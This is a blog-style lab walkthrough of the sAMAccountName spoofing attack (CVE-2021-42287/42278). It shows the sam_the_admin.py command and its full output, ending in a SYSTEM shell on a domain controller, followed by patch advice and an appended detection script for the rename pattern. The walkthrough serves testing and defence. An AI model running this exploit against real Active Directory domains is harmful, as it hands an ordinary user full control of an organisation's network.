A new year and yet another way to take over Microsoft Active Directory.
Back in November last year, Microsoft patched two Active Directory privilege escalation vulnerabilities. Combined, these two vulnerabilities allow a standard domain user to take over an Active Directory setup.
These two privilege escalation vulnerabilities are tracked as CVE-2021-42287 and CVE-2021-42278. GitHub user WazeHell created a PoC for the combined takeover attack using python3 and impacket. This tool was released on 11/12/21 on both GitHub and Twitter. Let's go ahead and lab it!

As always, seek permission before using such tools on a production network, or use a VMware lab so that no one gets hurt!

1. A Kali Linux VM (python3 and impacket should already be installed)
2. Download the repository from WazeHell's GitHub – sam_the_admin.py
3. In this example our VM host ip is and our DC is
4. Set up a standard Windows AD domain and a domain user account / password. Make sure the November 2021 security patches are not installed.

1. Launch a Kali Linux terminal and run the command:
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip -shell
2. If all goes well, you'll see the privilege escalation output of the Python script, in which it creates a machine account and impersonates the administrator.
python3 sam_the_admin.py "testdomain/dummy:TestdomainPW!" -dc-ip -shell
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[*] Selected Target dc1.testdomain.network
[*] Total Domain Admins 1
[*] will try to impersonate Administrator
[*] Current ms-DS-MachineAccountQuota = 10
[*] Adding Computer Account "SAMTHEADMIN-93$"
[*] MachineAccount "SAMTHEADMIN-93$" password = 4Ug3TAHquT^U
[*] Successfully added machine account SAMTHEADMIN-93$ with password redacted.
[*] SAMTHEADMIN-93$ object = CN=SAMTHEADMIN-93,CN=Computers,DC=testdomain,DC=network
[*] SAMTHEADMIN-93$ sAMAccountName == dc
[*] Saving ticket in dc1.ccache
[*] Resting the machine account to SAMTHEADMIN-93$
[*] Restored SAMTHEADMIN-93$ sAMAccountName to original value
[*] Using TGT from cache
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Saving ticket in Administrator.ccache
Impacket v0.9.24.dev1+20210727.163808.5f1ced6d - Copyright 2021 SecureAuth Corporation
[!] Launching semi-interactive shell - Careful what you execute

3. It will drop to a shell on the DC, where you are running as SYSTEM:
nt authority\system


Install the November 2021 Microsoft security patches for Windows Server platforms in your environment.
As you can see above, the exploit is trivial to perform, with minimal effort required.
You can also use a threat query with Microsoft 365 Defender, which Microsoft details here.
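
The tool output above shows the new machine account's sAMAccountName being changed to the DC's name without the trailing $ and then restored. The Python sketch below is an added example (not part of the original post or of the sam_the_admin project) that flags that rename pattern; the event records are constructed, and the simplified field names standing in for Windows Security events 4741 (computer account created) and 4781 (account name changed) are assumptions.

```python
from datetime import datetime, timedelta

# Constructed sample records, not real logs. Field names are simplified
# assumptions; map them from your own 4741/4781 export before use.
EVENTS = [
    {"time": "2022-01-05T10:00:01", "id": 4741, "actor": "dummy", "new": "SAMTHEADMIN-93$"},
    {"time": "2022-01-05T10:00:03", "id": 4781, "actor": "dummy", "old": "SAMTHEADMIN-93$", "new": "dc1"},
    {"time": "2022-01-05T10:00:06", "id": 4781, "actor": "dummy", "old": "dc1", "new": "SAMTHEADMIN-93$"},
    {"time": "2022-01-05T11:30:00", "id": 4781, "actor": "helpdesk", "old": "LAPTOP-07$", "new": "LAPTOP-08$"},
]
DC_NAMES = {"DC1$"}  # sAMAccountNames of the lab's domain controllers (assumed)


def find_spoofed_renames(events, dc_names, window=timedelta(minutes=5)):
    """Return findings for machine accounts renamed to a name without '$'."""
    dcs = {name.rstrip("$").lower() for name in dc_names}
    renames = sorted((e for e in events if e["id"] == 4781), key=lambda e: e["time"])
    findings = []
    for i, ev in enumerate(renames):
        old, new = ev["old"], ev["new"]
        # Only a machine account (ends with '$') losing its '$' is of interest.
        if not old.endswith("$") or new.endswith("$"):
            continue
        t0 = datetime.fromisoformat(ev["time"])
        # Was the original name put back shortly afterwards, as in the output above?
        restored = any(
            later["old"].lower() == new.lower()
            and later["new"].lower() == old.lower()
            and datetime.fromisoformat(later["time"]) - t0 <= window
            for later in renames[i + 1:]
        )
        # Did the same user create this machine account (event 4741)?
        self_created = any(
            e["id"] == 4741 and e["new"].lower() == old.lower() and e["actor"] == ev["actor"]
            for e in events
        )
        findings.append({
            "account": old,
            "spoofed_as": new,
            "actor": ev["actor"],
            "matches_dc": new.lower() in dcs,  # new name equals a DC name minus '$'
            "restored": restored,
            "self_created": self_created,
        })
    return findings


if __name__ == "__main__":
    for finding in find_spoofed_renames(EVENTS, DC_NAMES):
        print(finding)
```

A finding with `matches_dc` set is the strongest signal; `restored` and `self_created` add context for triage.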